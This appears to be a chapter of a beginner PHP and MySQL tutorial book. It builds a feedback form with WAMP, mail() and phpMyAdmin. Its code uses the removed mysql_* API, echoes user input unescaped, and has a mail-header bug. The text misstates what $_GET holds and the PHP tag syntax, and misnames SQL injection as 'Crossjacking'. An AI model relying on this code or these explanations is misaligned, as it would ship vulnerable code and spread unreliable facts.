web server 

M: MySQL an open-source Relational Database Management System (RDBMS) 
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P: PHP the programming language and web application engine 

 

The WAMP bundle is free just like most other Open source project, and can be downloaded from 

from online, just Google WAMP server and you will see differend flavous of this sofwyware, after 

downloading it, you can then install, below is what my version looks like while installing. 

 

As you can see in the screenshot above that WAMP is installed to C:\wamp by default. Later we will 

need to access the web server root from here.  

 

Now that we have installed the server, we can now start and test it. 

Note: there are several versions of WAMP bundles so your copy may not look exactly like mine, but 

never mind it will still work all the same. 

 

Starting and Testing the Server 
If the server is not already started, from the windows start button, click All Programs, then 

WampServer and click start WampServer. See the screen shots below, (not I’m using Windows 7)   
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This is very important to beginners, after WAMP server is installed, it will indicate an icon in the 

system tray at the taskbar, as we have in the screenshot below (right) Note: if this is not visible, you 

may have to expand the system tray, as I did in the screenshot below (left)  

 

Note: if WAMP server icon (as we have above in the taskbar) is red or yellow, this means that one or 

more of its programs is still starting, you will have to wait for few seconds but not up to a minute, for 

it to turn white, which mean all the service has successfully started. 
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However if it remains red or yellow indefinitely (as we have it the screenshot above), then there is a 

small problem with the server starting, this is often cause by another program using the default port 

80, which the WAMP (Apache server) actually need.  

So the best thing to do is to either, Test the Port 80 to find the interfering program and close or 

terminate it OR change Apache from using the default port 80; the former is preferable, so I will 

explain how to do it here: 

 (1) Click the WAMP Icon (2) Click Apache (3) Click Service (4) Click Test Port 80 

 

No interference in the example above as Port 80 is use by Apache 

Also note that you will have to start the server each time you shutdown and start your computer. 

  

Testing the server 
To test the web server, we are going to create a new web project in the root directory of the WAMP 

server, see the step below. 

Step1. Go to the following location from your computer C:\wamp\www 

Or click www directory from the WAMP icon on the taskbar. See the screenshot below. 
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This will open the root directory C:\wamp\www of the WAMP server 

Step2. Create a new folder name it test in this directory.  

Step3. Open the folder and create a file inside it name index.php  

Although PHP code can be integrated into HTML code, but the file must carry the .PHP file extension. 

This is why I insist that the file should have .php extension instead of the usual .htm or .html 

because it will contain the HTML as well as PHP code as we have below. 

<HTML> 

<HEAD> 

<TITLE> Testing PHP </TITLE> 

</HEAD> 

<BODY> 

<?php  

print "Today's date is: ". date('d-m-Y'); 

?> 

</BODY> 

</HTML> 

 

Note that the’ Y’ in date('d-m-Y')is in capital letter, this will make the year to display in full, as 
2014 rather than 14  
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So open the index.php file either in notepad or Dreamweaver and enter code above into it. Note: I 

bolded the PHP line so that you can notice it, also the screenshot above is a Dreamweaver view of 

the code and it indicate PHP codes in different red-dominated colours, which can be very helpful. 

To see the result of this PHP code, start your browser and type http://localhost/test at the address 

bar (the server will map to the index or homepage automatically), or better still point to the page 

directly by typing http://localhost/test/index.php See the result. 

 

Server-side difference 

Recall in the introductory chapters of the book, that in server-side architecture that the server-side 

code; in this example PHP, is process on the server and the server return the result in pure HTML in 

response to the user’s request. To understand what I mean try to view the source of this page from 

the browser see the result.    

In internet explorer click from the menu bar View > Source See the screenshot below. 
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Note: I press ALT on keyboard to display my menu bar; you may not have to do this if the version of 

your browser (Internet explorer) down not shows the menu bar by default. 

Now see the result of this below, and you will notice that it does not contain any raw server-side 

code (PHP) but the process result in text or html. 

 

This means that you cannot double click a PHP page to preview it on the browser as you’ve been 

doing with HTML, you must request for it just like you do with every other website online, such as 

http://www.google.com the only difference between this and the later is that, ours is on a local 

server, while the later is on a remote server accessible via the internet. 

This also have a security advantage, because your sensible programs or code is hiding from every 

visitor or user of your website or web application. 

Now we can dive deeper into programming with PHP. 

PHP Code block, Variables  
PHP is influenced by C languages, just like JavaScript. We won’t go into detail since we’ve I assumed 

that you’ve learnt JavaScript in the early chapter of this book, therefore I will focus more on areas 

that are not synonymous with JavaScript. 
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First, PHP statement or code must reside with the within the PHP; start <%php and end %> block as 

you have seen in the last example. 

 Secondly, PHP variable must start with a dollar sign $, for example $LastName while all other rules 

in the JavaScript chapter are all applicable too for naming the Variable. 

Finally PHP is loosely typed language, that is, it determine the data type of a variable at run time 

when you request the PHP page or function, this is a feature that languages like C, C++, Java, C# and  

others, strongly discourage, as they insist you must declare every variable before usage, hence they 

are called strongly typed language. This PHP feature has it advantage and disadvantage, but just as I 

said earlier Rasmus Lerdorf (creator of PHP) must have taught that most web developer or 

programmers are also busy with other things therefore saving them from this hustle of declaring all 

variable with type before usage, we will see the next example Form processing using PHP what I 

mean. 

Although the variable described above is what most people refer to as variable but PHP also other 

kinds of built-in variable for different types of operation, see the list below: 

$_POST: holds variables provided through the form POST method 

$_GET: holds variables provided through the POST method 

$_SESSION: holds any variables that are currently registered in a session 

$_SERVER: holds server related information such as headers and file paths 

$_FILES: holds any variables provided through file uploads. 

$_ENV: handles server environment related variables. 

Although PHP has more than this unique variables, but these are the ones we are likely going to be 

using in the book, most especially the first two or three, this is because the $_POST is often use to 

collect data from form with POST method, and this is where web application becomes very handy, 

See the next topic form processing for more.   

 

Form processing using PHP 
Create a simple form in the index.php page we earlier, below is the source. 

index.php 

<HTML> 

<HEAD> 

<TITLE> Testing PHP </TITLE> 

</HEAD> 
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<BODY> 

<form method="post" action="process.php"> 

  <input type="text" name="country" > 

  <input type="submit" name="button" value="Submit"> 

</form> 

<p> 

<?php 

print "Today's date is: ". date('d-m-y'); 

?> 

</p> 

</BODY> 

</HTML>  

I bolded three of the most important attributes of the form:  

first is the method=”post”, this indicates the method we want the form to use in submitting its data, 

therefore we have to use the PHP $_POST special variable to access its data likewise.  

Secondly the action="process.php" which tells the form where to post the data to, in this case a 

page name process.php, which we will create next and will contain some PHP code to handle and 

respond to the form. 

Then thirdly, name="country" this is actually the name of the textbox or text field, to collect or 

respond to this textbox, that is process or display it value, we will have to reference this name using 

the form post method as we have here $_POST[“country”]. 

 

Now let’s create the process.php page in the same “test” website where we have the index.php, to 

make this process easy, I decided to define the website using Dreamweaver, below is the 

screenshots. See Dreamweaver chapter, to see the steps. 
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After defining the website, we now have the screenshot below, after I’ve open the index.php page 

and switch to code view. Please note, that you can ignore this, if you’re not using Dreamweaver and 

just create the process.php just as you did with the index.php  

 

Now create the process.php page and let it contains the code below.  
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Note: If you are using Dreamweaver see Creating webpage and Saving webpage, also beware that 

Dreamweaver will also all some other addition tags, but your concern should be only to add the PHP 

code.  

process.php 

<HTML> 

<HEAD> 

<TITLE> Testing PHP </TITLE> 

</HEAD> 

<BODY> 

<?php 

//assign the value of the textfield to a variable 

$val = $_POST["country"]; 

 

//display the some msg and the value of the variable  

print "Your from ". $val; 

?> 

</BODY> 

</HTML> 

The PHP started with a comment line; recall that JavaScript that comment is a non-executable line 

that helps the programmer to describe what a program line of section is doing, for easy 

maintenance. As you can see in the program above that the first comment tell you what the line 

below is doing, which is to collect value from the “country” text field submitted with POST method 

and assign or store this value to the $val variable. 

And the next line also have a comment, describing what the line below it is doing, I thinks this 

comment describe this line better so I don’t have to tell you what it does again. Now let’s test this. 

Open the index.php in a browser as we did earlier, and enter “Nigeria” into the text field and submit, 

this will post that data to the process.php page, which will display a message with the value you 

enter. See the screenshots below. 
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As you can see, it is that easy, now recall that we said PHP is loosely typed language, that has come 

to play a role here, because we entered a text the $val variable stored the value as String, similarly if 

we had enter a number let’s say 5 this same variable will behave like an Integer or we entered 10.2 

it would handle it as a Double or Float, as I said this is what you enjoy only in a language like PHP but 

not in Java or C# because they are tightly typed language, I need not go further if you are interested 

in this difference or feature you can go to the internet and search. 

Lets modify process.php, to multiply the value of whatever we have in the $val variable by itself.   

process.php 

<HTML> 

<HEAD> 

<TITLE> Testing PHP </TITLE> 

</HEAD> 

<BODY> 

 

<?php 
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//assign the value of the textfield to a variable 

$val = $_POST["country"]; 

 

//multiply the value by itself   

$val_mult = $val * $val; 

 

//display the some msg and the value of the variable  

print $val . " multiply by $val is: ". $val_mult; 

?> 

</BODY> 

</HTML> 

 

The first bold line uses a multiplication (arithmetic) operator to multiply the variable $val by itself  

$val * $val and store the result it a new variable $val_mult, while the next or last bolded line does 

the display or output. Note however that the show the print or output line concatenate or joint 

some variable to the string message using a period or dot (.)  

$val . "multiply…". $val_mult which is the normal and expected in other “strongly 

typed” programming languages, but you could also notice a strange variable right inside the string 

not concatenated " multiply by $val is: "  yet PHP still considered this a no problem, 

this is another feature of a loosely typed language like PHP, no wonder another popular PHP book 

called the language a forgiving language. 

 

To test this, enter a number into the text field in the form and submit, for example I enter 50 and 

submit see the screenshot below. 

  

As I said earlier, that this chapter of the book won’t go into detail explaining Operators, Decision and 

Looping in PHP because It just the same with that of JavaScript and since we’ve treated all this in 

JavaScript I’m expecting you to must have gone through that. 

This chapter is more about showing you some useful and simple task you may likely be handling with 

PHP, such as a program to send emails, connecting to a MySQL database, querying the database and 

a simple user authentication program, which could give your PHP career a boost. 
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The GET method 
Recall that a form can post using either the POST method, which you’ve seen in the last example, or 

the GET method, which I will explain in brief here. 

Unlike the POST method the GET method attached and pass the information supplied in the form, 

through the form to the URL, then you can request for the value or data in PHP using the $_GET 

instead of  $_POST as we did in the case of POST method. 

Let’s see a quick example of this; this is similar to the last example except that we change the POST 

to GET. 

First the form…. 

gettest.php 

<HTML> 

<HEAD> 

<TITLE> GET test </TITLE> 

</HEAD> 

<BODY> 

<form method="GET" action="getprocess.php"> 

  <input type="text" name="country" > 

  <input type="submit" name="button" value="Submit"> 

</form> 

</BODY> 

</HTML>  

 

getprocess.php 

<HTML> 

<HEAD> 

<TITLE> GET test </TITLE> 

</HEAD> 

<BODY> 

<?php 

//assign the value of the textfield to a variable 

$val = $_GET["country"]; 

 

//display the some msg and the value of the variable  

print "You from ". $val; 

?> 
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</BODY> 

</HTML> 

 

Now imagine I fill the gettest.php form as we have below. 

   

And submit; you can see everything attached to the URL at the address bar, below. 

  

Note: sincerely I’ve never built a form using a GET method, because I don’t think it’s suitable for this; 

first, it exposes one to a security risk, imaging having a password field where everyone can see the 

value beside it doesn’t make any sense having any of your data posted via a GET method, as a result 

some modern browsers just hide this extra query string attached to the URL, including the Opera 

browser I use in the example, in order for me to print this screen I just click on the address bar to 

make the full URL to display. 

This doesn’t however means that the GET method is useless, but its best use for linking a URL with a 

query string, as we will see later in Deleting records. 

So let’s continue with the email sending program. 

Sending E-Mail with PHP 
Although one single line of PHP could do this (send email) but it will be helpful if I could make this 

program a little detail. Let’s assume that your client want you to program his website feedback or 

contact form to send or submit visitor’s comment or question they supply via the form to his e-mail, 

although this data can also be stored in the database but I’ve seen that some clients, most especially 

the busy or “technophobia” ones would prefer to access this important information using their email 

which is a technology they are already use to as compare to any other “new” thing you want to 

introduce them to. 

Below is the assumed contact form. 

contact.htm 
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<HTML> 

<HEAD> 

<TITLE> Company Feedback </TITLE> 

</HEAD> 

<BODY> 

<form method="post" action="contact.php"> 

    <table> 

<tr><td colspan="2"><b>FEEDBACK FORM</b></td></tr> 

      <tr><td><strong> Name</strong></td> 

<td> 

<input name="names" type="text" id="names" size="30"/> 

</td> 

     </tr> 

     <tr><td><strong>Email</strong></td> 

<td> 

<input name="email" type="text" id="email" size="30" /> 

</td> 

     </tr> 

     <tr><td></td> 

<td> 

<textarea name="comment" cols="30" rows="5" id="comment"> 

</textarea> 

</td> 

      </tr> 

 <tr> 

<td></td> 

<td><input type="submit" name="Submit" value="Submit" /></td> 

      </tr> 

      </table> 

 </form> 

</BODY> 

</HTML> 

 

This HTML code is a simple form, I structured it using table, as you can see the table is inside the 

form tag, and it hold or structured the text and form elements, below is the preview of this form.  
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Below is the PHP page (contact.php) that the contact.htm form will submit to, the page does the task 

of forwarding the information supplied to an e-mail address. 

contact.php 

<HTML> 

<HEAD> 

<TITLE> Company Feedback </TITLE> 

</HEAD> 

<BODY> 

 

<?PHP 

// keep the form data in variable   

$name=$_POST['names']; 

$email=$_POST['email']; 

$comment=$_POST['comment']; 

 

//the sender email  

$from='no-reply@company.com'; 

 

// building the message or email body 

$msg='New feedback message from my website,'."\r\n"; 

 $msg .='Name :' .$name. "\r\n"; 

$msg .='Email :' .$email. "\r\n"; 

$msg .='Comment :'.$comment; 

 

//company email address, to send the feedback to 

$to='info@company.com'; 
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// the email title 

$title=' New feedback message from my website '; 

 

// some header properties of the email 

 $headers = "From: ". $from ."\r\n"; 

 $headers .= "Reply-To: ". strip_tags($reply_to) . "\r\n"; 

 $headers .= "MIME-Version: 1.0\r\n"; 

 $headers .= "Content-Type: text/plain; charset=utf-8\r\n"; 

 

// send the email 

 mail($to,$title,$msg,$headers); 

 

print "Thanks for your feedback; we will get back to you as soon as 

possible, if required of us. "; 

?> 

</BODY> 

</HTML> 

 

I believe the PHP code above is quite explanatory because of the comment lines, although every line 

is important but one line I want you to take note of is the one in bold 

mail($to,$title,$msg,$headers); because this line that actually sent the email , if you look carefully 

at each line of code above you will notice that they only store or hold the required data into some 

variables, which were now used by this mail() line. 

Note: if you test the program on the localhost, you will get error message as we have below. 

 

This is because there is no email server setup to handle this task, although this will work fine if 

uploaded to your remote or hosted server online, although I downloaded an Email server program 

and set it up locally to test, if you care for this, download and setup hMailServer 

http://www.hmailserver.com  

 

To test this example using a local email, for example hMailServer, I have to edit the email address to 

sent the email to, to ben@localhost, see the code below, note I actually commented the former 

line… 

http://www.hmailserver.com/
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Note: I’ve already created the local email address ben@localhost in my hMailServer. 

Then I fill the feedback form, as I did below.  

 

When I submit the form, no error is shown since the mail server and email exists.  

 

Then I reach to the location of the hMailServer directory where the emails for ben@localhost is 

kept, this can be a long journey as you can see on the address bar.   
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Because the email is kept as raw file, a unique folder is created automatically for each email that 

comes in, so I assumed that 6A, is where the most recent email is kept. 

 

And when I opened the folder, the email file also have a unique name, note the file has .EML file 

extension, so I had a problem opening it (in Windows 7, but not Windows XP), so I quickly Google for 

an EML viewing application and download one for free and make it the default program to use in 

opening such file. So when I double click the email file it opened with the EMLViewer, as we have 

below.  
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That all, it works fine! However note that you don’t have to go through all this to test as I said earlier 

just upload it to your hosting web space online if you have one, the hosting company already have 

everything taking care of,  I just love to see how things work below the surface that’s why I did all 

this, I guess this has also made me to prefer using an editor such as notepad++ or light-weighed 

JCreator IDE  to build java applications instead of heavy NetBeans or Eclipse because I want to be in 

control of my programs as much as possible instead of having some IDE add some magical code into 

my program that I may not understand. 

 

Interacting with a Database (using PHP with MySQL) 
Today, you can’t talk about web development without talking about database backend, because web 

has being the best platform for sharing or disseminating information and database it the largest and 

most structure option for storing data in its largest or unlimited form.  

Let’s consider for example that we want to send an email or updates to all those who have sent us a 

feedback, if you had only sent the feedback to an email I’m sure you won’t be able retrieve this 

easily, unless you start opening every email to collect their email addresses but with a database you 

don’t have to go through all this hustle. 

Beside virtually every website or application you can think of are all database-driven such as my 

Online art gallery; bengallery.com, facebook, twitter and others, so the mastering of a basic or deep 
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database knowledge is a prerequisite for being a good web developer, and this is something that 

interesting me about web development, it require these array of knowledge from project 

management to information design, programming and database development, although if you work 

in a large organization that is well-to-do  they may require separate professionals to handle each of 

this areas.  

So as we start using PHP with MySQL, we will start with a basic database introduction so that we can 

deal with some database term such as RDBMS, Database, Tables, SQL, among others.       

 

Introduction RDBMS and Database 
Although there are too many books that treat this topic in more detail, but to make things easier for 

you I’ve decided to give a quick intro. 

 Most IT professionals and not IT people always refer to MySQL, Oracle or MS SQL Server as 

database, while in the real sense this are just products and not a databases, these are mere products 

own by their respective vendors or community, because according to the Microsoft Computer 

dictionary, Fourth Edition. Database is define as a file composed of records, each containing fields 

together with a set of operations for searching, sorting, recombining, and other functions.  This 

means that a database is simple a structured collection of related data, records or information. For 

example a database of a company can keep records of employee, products, customer and many 

other related records.  So what can we call MySQL then? 

MySQL just like others, is actually a Relational Database Management System (RDBMS) while 

studying Computer science at the college, I learnt that they are different types of database 

management technologies, but from my practical knowledge I’m sure that the RDBMS is most 

popular and widely used. So what is the relationship between RDBMS and Database?  A simple 

illustrated answer to this is the cake pan and the cake, you don’t eat the cake pan but you use it to 

produce the cake that you actually eat. Although RDBMS and Database may be more related; apart 

from using a RDBMS such as MySQL to create a Database, you still need it to manage or administer 

it, I believe this is one of the reasons why most people can hardly differentiate between this two 

because I’m sure most of the people using this technology have not really seen their database file on 

a physical location other than through the RDBMS administrative environment. 

 

How the database is structure 
From the definition of database, I am sure it would be helpful to know some basics structures of 

database.  

First a database is mainly made up tables, a table can contain one or more fields and these tables 

hold or store independent records using these fields. 

However a record can be seen as a row made up data about one particular entity.  
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To understand this better I took time to create the illustration of Bengallery Info Tech database 

structure below. 

 

 

 

 

Although we create and manage a database using a RDBMS such as MySQL, which offer several 

administrative environments such as the console interface or the windows based MySQL workbench 

or even the more popular browser-based PhpMyAdmin (which we will be using later) which makes 

your interaction with the database easier, without necessarily using a Structured Query Language 

(SQL) for everything. SQL is the standard language for interacting with a relational database. 

However as a web developer it is mandatory you have basic knowledge SQL, because you will be 

writing SQL query within your PHP program.    

Please note, don’t confuse, MySQL with SQL, as explained earlier the former is a Relational Database 

Management System (RDBMS) while the later is a query language, which according to standard can 

be use to query or interact with any relational database, either Oracle, PostgreSQL, MS SQL Server or 

MySQL database 
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To explore the PHP and MySQL database integration, we will be creating another version of the 

feedback system, this time the submitted feedback will be stored in a database then we will learn 

some common interaction we may have with this records in our database. 

  

Creating a Feedback system 
In any database-driven web application or systems it is always a good approach to start from the 

ground to top, of from the backend to the frontend; therefore we will start from our backend which 

is to design and create the database, please note that I said design before create. This is because the 

design of a database is a serious business that involve creating a blue-print of what the database 

would look like on a piece of paper before moving to the computer, on a small scale project like this 

we may not have much problem because the database may probably have just one table, but in a 

banking application or educational management systems, where we may have close to if not more 

ten tables in its database, most which will be related, this would be more complex and therefore 

require more patience to design.    

Creating the Database 

Below is what the design of my feedback database would like, please note I prefer to name the 

database after the owner company’s name, which I shortened to BGdb.  

 

 

As you can see the Feedback table’s fields is design after the data expected from the Feedback form, 

except for the id and date_submit which plays important role; the id field usually contain auto-

generated ascending numbers, this field is actually the primary key of this table, a primary keys 

uniquely identifies an individual record, for example your bank account number or your student 

matriculation number is a typical example of a primary key; this ID’s are unique that no students 

have the same in a particular school, that is why when your lecturer or school authority wants to 

discipline a student they go after his or her matric number and not there name because we may 

have students bearing the same first and surname but not matric number. With this number they 
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can easily access a student record successfully. And the date_submit field is for the company to 

know when the feedback or comment was submitted or sent. 

Now we can create the database using PhpMyAdmin, I assume that WAMP server is already started. 

See the Starting and Testing the Server page. 

There are two ways you can start PhpMyAdmin; first, through the alias of the server from the 

taskbar. See the screenshot below. 

 

Or simply type the URL http://localhost/phpmyadmin directly to the address bar. 

Below is the screenshot of PhpMyAdmin’s homepage.   

http://localhost/phpmyadmin
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The home of your PhpMyAdmin would look exactly like what I above except that the list of the 

databases (4r, airline, bookshop…..wordpress) at the left won’t be available or be exactly the same 

with what I have above. 

Now enter “BGdb” in the field below the text “Create new database” and click the “Create” button 

to create our new database, see the screenshot below. 
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 After clicking the Create button, the database will now be created and will automatically be the 

active or selected database as you can see below. 

 

Note: any task done with PhpMyAdmin actually issues an SQL query to the MySQL database, as you 

can see in the SQL query box above: CREATE DATABSE ‘BGdb’;  

As you can see we have no table in our newly created “BGdb” database, we can now create the 

table. Enter “Feedback” in the field below Create new table on the database BGdb” and enter “5” 

for the Number of fields and click the “Go” button.  

See the screenshot below 
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Immediately this is done, you will see several form elements arranged as we have below, this is to 

enable you to setup the five (5) fields and their respective properties.    

 

 

Now let’s start with the first and probably the most important field, ID. 
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I fill the id space as we have below

 

 Field (id): this is the name of the field   

 Type (INT): this will ensure that only whole number is permitted in this field  

 Length/Values (10): this set the number digit for this “id” field, 6 would be a million, 

therefore 10 is very large set of digits, isn’t it?     

 Null (not null): this is important as it force the “id” field not to return a null value  

 Extra (auto_increment): this will enter auto generated number in this id field (in ascending 

order 1, 2, 3…) when we enter record into this table   

 Primary key: this makes this “id” field to be the primary key.  

 

Similarly I fill the other fields as we have in the screenshot below. These fields are name, email, 

comment and date_submit, while the properties I set for each of these are only Field, Type, 

Length/Values and Null  
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When this is done, then click the “Save” button and the Feedback table will be created as we have 

below. 

 

If you prefer to do this using an SQL statement, click the SQL tab, 

 

And enter this SQL below, in the box before clicking the “Go” button.  
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CREATE TABLE Feedback ( 

id INT(10) NOT NULL AUTO_INCREMENT , 

name VARCHAR(255) NULL , 

email VARCHAR(255) NULL , 

comment TEXT NULL , 

date_submit DATETIME NULL , 

PRIMARY KEY (id)  

); 

 

To show this SQL example (below) I replace Feedback with Feedback2 so the name won’t conflict 

with the existing Feedback table. 

 

Clicking the “Go” button the table would was created. 
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I knew using this SQL method could be little bit awkward to some new web developer, so let’s use 

this opportunity to learn how to delete this table. The technical term for this is “drop” so let’s drop 

the feedback2 table.  

Dropping table 
You can also drop an entire database this way as well 

1. Click or select the table “feedback2” (see where the arrow points to at the last screenshot, 

above) 

2. Click the “Drop” tab from the menu, see the screenshot below. 

 

3.   A warning message will appear, just click the “Yes” button  
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When this is done we should have just one table in our database once more. 

  

 

Connecting to a database 
After setting up the database the next thing is to connect our PHP pages to the database. 

PHP primary database is MySQL, so it support several MySQL function, compare to any other RDBM. 

PHP function or syntax to connect to MySQL RDBMS is:  

mysql_connect (hostname, username, password) 

This is often followed by the code that selects your actual database 

mysql_select_db (database_name) 

 

Now to connect to our BGdb database, I use the PHP code below, this includes the two functions 

above, and I supply the right value for the parameters. 

$conn = mysql_connect ('localhost', 'root', '') or die('Could not 

connect: ' . mysql_error()); 

mysql_select_db ('BGdb') or die ('Could not select database: ' . 

mysql_error() );  

 

Because we are accessing the site on a local sever; the value for some of these parameters remains 
the same, such as: 
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Hostname = „localhost‟ (though most online server most especially Linux/cpanel hosting 
I’ve used also leave the hostname as localhost, except for windows hosting I’ve use; nevertheless if 
your hosting company must use another name other that localhost then you will be informed. ) 

 

Username = „root‟ (root is a default MySQL username when you are on a local server, you will 
however using a more unique or secure name when you are on an internet host) 

 

Password = „‟ (actually this password parameter is left empty. This is the default password for 
‘root’ on a local server, you will however using a more unique and secure password when you are on 
an internet host) 

 

Database_name = 'BGdb' (the name we gave to the database) 

 

To actually use the connection string, programmer or developer prefer putting this important setting 

into separate file because severally pages will be using it, so that you with have just one file (For 

example, conn.php) to modify (instead of several pages) when moving the website from a localhost 

to an internet host. 

So create a new page name it conn.php and put the connection string, as we have below.  

 

 

Insert the data submitted into the database 

conn.php 

<?php 

$conn = mysql_connect ('localhost', 'root', '') or die('Could not 

connect: ' . mysql_error()); 

mysql_select_db ('BGdb') or die ('Could not select database: ' . 

mysql_error() );  

?> 

 

We are still using the contact.htm we use earlier, below is what it looks like once again. 
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Note: I have to change the ACTION attribute of this contact.htm from contact.php to the newly 

database version “contactdb.php” below is what I mean. 

<form method="post" ACTION="contactdb.php "> 

            <table> 

              <tr> 

                <td colspan="2"><b>FEEDBACK FORM</b></td> 

                </tr> 

              <tr> 

                <td><strong> Name</strong></td> 

                <td><input name="names" type="text" id="names" 

size="30" /></td> 

….. 

….. 

….. 

</form> 

 

And below is the contactdb.php that this form is submits to 

contactdb.php 

<?php 

//include the connection string 

include("conn.php"); 

 

// keep the form data in variable   

$name=mysql_real_escape_string($_POST['names']); 

$email=mysql_real_escape_string($_POST['email']); 

$comment=mysql_real_escape_string($_POST['comment']); 
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//store the query in a variable   

$sql="INSERT INTO feedback  VALUES ('','$name','$email', 

'$comment',now())";   

 

//execute the quesry 

mysql_query($sql,$conn) or die(mysql_error()); 

 

//store the thanks msg 

$msg = "Thanks ".$name." for your feedback."; 

?> 

<HTML> 

<HEAD> 

<TITLE> Company Feedback </TITLE> 

</HEAD> 

<BODY> 

<?php 

// display the thanks msg 

print $msg; 

?> 

</BODY> 

</HTML> 

 

Just like the other PHP codes, this one is also well commented. The first line 

include("conn.php"); includes the conn.php file which contains the connection string to our 
database. 

While the next set of line, contains variables that hold the values from the submitted forms element:  

// keep the form data in variable   

$name=mysql_real_escape_string($_POST['names']); 

$email=mysql_real_escape_string($_POST['email']); 

$comment=mysql_real_escape_string($_POST['comment']); 

 

Note the mysql_real_escape_string() is a MySQL function use  to filter or prevent attacker 
from entering malicious input into our database in order to hack our website, this has been a 
common phenomenon in website attacks. It’s commonly called Crossjacking 

There for its important that we clean up our entering since we cannot trust the person accessing our 
website from all over the world. 

 

This is also followed by another variable that hold the SQL INSERT statement 
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$sql="INSERT INTO feedback  VALUES ('','$name','$email', 

'$comment',now())"; 

 

This SQL statement INSERT the values from the contact form to the feedback table, using the 
structure of the table, I left the first field empty using „‟ this is because we have set this field to an 
auto-generated number and that will be taken care of by the database, this is followed by the name 

field which will store the value from the variable $name, same followed by email and comment 
field,  the lasted date_submit field uses a built in MySQL function now() to insert the current 
date and time.  

Finally I kept the “Thank you” message in a variable called $msg, $msg = "Thanks ".$name." 
for your feedback."; 

Then we display or print in the BODY of the HTML print $msg; 

 

 

 

To test this, access the contact.htm on your browser by type this URL on the address bar 
http://localhost/bws/contact.htm 

 

After the contact.htm has loaded, I enter some data as we have below.  

 

When I click the Submit button the form is posted to contactdb.php which adds or inserts the data 
to the feedback table of our bgdb database and display a nice message on the screen as we have 
below.  
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To confirm or see the data inserted, I return to PhpMyAdmin and select our bgdb database by 
clicking on it from the list of databases.  

Note: I have many existing database project on this list. 

 

After clicking the database it becomes active, and then I click on the browse icon  before 
feedback, to see the table in dataview.  

 

 

Note: if you click on the text “feedback” instead on the browse icon, the table will show in structure 
view and not data view below is what both view will look like. 
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Note: if you are in structure view you can click the “Browse” tab at the menu above to switch to 
Dataview, beside I notice in the newer version of phpMyAdmin (on my internet host) that clicking 
the name and the icon before the name, does just the opposite as this version of phpMyAdmin.     

 

Now that we have confirmed the presence of the data, we can now proceed to the next topic, which 
is actually a continuation of this. 

 

 

Selecting the Records 
Despite the simplicity and easy environment of PhpMyAdmin, it’s still not the best place to ask your 

clients (website owner) to view records or data. First, It may not be easy to access for a non-IT 

personnel; secondly it present too many database administration features which can baffle a non-IT 

personnel (and if care is not taken he or she may drop the entire database by mistake) and Finally 

for security reason, a database of a company is a key component of the organization or project that 

must be within the reach of only key, trained and experience IT personnel.  
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However we can query or retrieve some records from time to time for some routine operation or 

decision making.   

For example we will be learning how to retrieve the records in the Feedback table and display it on a 

PHP page called feedback_list.php  

As said earlier about isolating the connection string to a file call conn.php, the feedback_list.php 

page we will be creating will also include the conn.php since the page will require some database 

interaction. 

 

feedback_list.php 

<HTML> 

<HEAD> 

<TITLE> Company Feedback </TITLE> 

</HEAD> 

<BODY> 

<b>FEEDBACK LIST</b> 

<br /> 

<br /> 

<?php 

//include the connection string 

include("conn.php"); 

 

//query the table 

$query  = "SELECT * FROM feedback"; 

$result = mysql_query($query, $conn) or die(mysql_error()); 

 

//loop through the query and print the result 

while($info = mysql_fetch_array($result)){ 

  $data_id = $info['id'];  

 $data_name = $info['name']; 

 $data_email = $info['email']; 

 $data_comment = $info['comment']; 

 $data_date = $info['date_submit']; 

 

  print "   

  NEME: $data_name  

  <br /> 
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  EMAIL: $data_email  

  <br /> 

  COMMENT: $data_comment 

  <br />  

  DATE POST: $data_date  

  <hr>  

  "; 

} 

?> 

</BODY> 

</HTML> 

   

In the code above, we use a SELECT query statement since we are retrieving, unlike the last example 
where we use INSERT. After the query the result was held with this function 

mysql_fetch_array($result) this enable us to loop though this array and print all the 
record or result of the query. 

 

Note that when print the result we integrate some HTML, specifically the break <br /> and horizontal 
line <hr> this gives a better display structure to this record. Below is the result of what we did, (I’ve 
fill and submitted two feedbacks so that we can have more data)    

 

 

You can also choose to tabulate these items; below is a screenshot of what I’m talking about. 
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feedback_table.php 

 

 

And below is the code: 

 

feedback_table.php 

<HTML> 

<HEAD> 

<TITLE> Company Feedback </TITLE> 

</HEAD> 

<BODY> 

<b>FEEDBACK LIST</b> 

<br /> 

<br /> 

<?php 

//include the connection string 

include("conn.php"); 

 

//query the table 

$query  = "SELECT * FROM feedback"; 

$result = mysql_query($query, $conn) or die(mysql_error()); 

 

//the table header 

print " 

<table width=\"50%\" border=1> 

<tr> 

<td>NAME</td> 

<td>EMAIL</td> 

<td>COMMENT</td> 

<td>DATE POST</td> 

</tr> 

"; 

 

//loop through the query result and print  
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while($info = mysql_fetch_array($result)){ 

 

  $data_id = $info['id'];  

 $data_name = $info['name']; 

 $data_email = $info['email']; 

 $data_comment = $info['comment']; 

 $data_date = $info['date_submit']; 

 

  print "  

  <tr> 

  <td> $data_name </td> 

  <td> $data_email </td> 

  <td> $data_comment </td> 

  <td> $data_date </td> 

  </tr> 

  "; 

} 

print "</table>"; 

?> 

 

</BODY> 

</HTML> 

 

I only wrap some HTML table tag with the PHP code, as I always insist that any serious web 
developer must understand this “lingua-franca” of the web called HTML. 

 

ORDER 
The feedback list must have displayed but your client may still complain, if he or she has to scroll 
down all the time to see the most recent feedback post, instead of seeing the most recent at the top 
of the list. This is also what your yahoomail does, it ordered the most recent email to be on top in 
your box. 

To do this we just need to alter the SELECT statement to ORDER its result in DESC (descending order) 
below is what the line of code should look like. 

 
Before (Note: by default it’s ordered in ascending) 
$query  = "SELECT * FROM feedback"; 

 
Now  
$query  = "SELECT * FROM feedback ORDER BY id DESC"; 

 
This will order the record to display in descending order. I ordered the record using the id field 
because it contain auto-generated ascending numbers.   

 
The screenshot should now look like what we have below. 
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Now let’s continue, but still on better way of displaying or viewing queried records. 

 

Limiting Records Using Pagination 
As this records grows from just 3 feedbacks to let’s say 3000 (three thousand) or more feedbacks, 
then you will run into load time error or delay as a result of  trying to display this huge number of 
record at once, this is where pagination comes in. 

Have you notice that whenever you search for a popular word like “Programmer” on Google it turns 
out thousands of search results, and it paginates these items into 10 result per views (I refuse to use 
the word per page, because all the result still loads on one page, but programmatically limited or 
paginated) this is a typical use of pagination, so let’s look at how to do this in the next example. 

 

To test this I have to enter at least 10 records (submitted using the feedback form), below is what I 
have. 
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The next screenshot below shows the paginated version.  

 

Note that I limit the display to 3 records per page, because we don’t have many records, so 
you can adjust this setting later in the code. But first let’s see what this paginated version 
looks like before its code.   

 

feedback_pg.php  

 

